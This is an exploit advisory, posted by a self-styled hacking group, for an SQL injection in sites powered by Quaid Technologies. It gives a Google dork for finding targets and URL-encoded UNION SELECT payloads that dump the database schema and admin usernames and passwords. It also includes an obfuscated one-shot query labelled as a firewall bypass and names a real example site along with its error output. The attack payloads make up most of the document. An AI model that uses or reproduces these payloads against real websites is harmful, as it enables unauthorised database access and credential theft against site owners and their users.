################################################################################################# # Exploit Title : Powered by Quaid Technologies QuaidTech Pakistan SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 21/06/2018 # Vendor Homepage : quaidtech.com # Tested on : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered by Quaid Technologies'' # Exploits : Data Manuel Checked => /PATH/contents.php?content_id=-32%27%20UNION%20SELECT%201,2,3,group_concat(%27<br>%27,table_name,0x3a,column_name),5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database()--+ Administration Login Credentials => /PATH/contents.php?content_id=-32%27%20UNION%20SELECT%201,2,3,group_concat(%27%3Cbr%3E%27,user_id,0x3a,username,0x3a,password,0x3a,encrypt_paswrd,0x3a,admin_type),5,6,7,8%20from%20admin_users--+ Dump In One Shot Query (WAF Bypassed :- v 1.0) /PATH/contents.php?content_id=-32%27%20UNION%20SELECT%201,2,3,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database()--+ ################################################################################################# # Example Site : aeo.com.pk/site/contents.php?content_id=-32%27 => [ Proof of Concept for SQL Injection ] => archive.is/6LKyI # SQL Database Error => Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/aeocompk/public_html/site/DBAccess/Database.inc.php on line 52 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 4--> Select id,title,brief,summary,content_date, display,filename,parent_id from site_pages where category_id = '-32'' and display='1' + Proof of Concepts [ Important Login Credentials and Database Checked ] : archive.is/6VZPr - archive.is/Plerh - archive.is/x3b7t ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################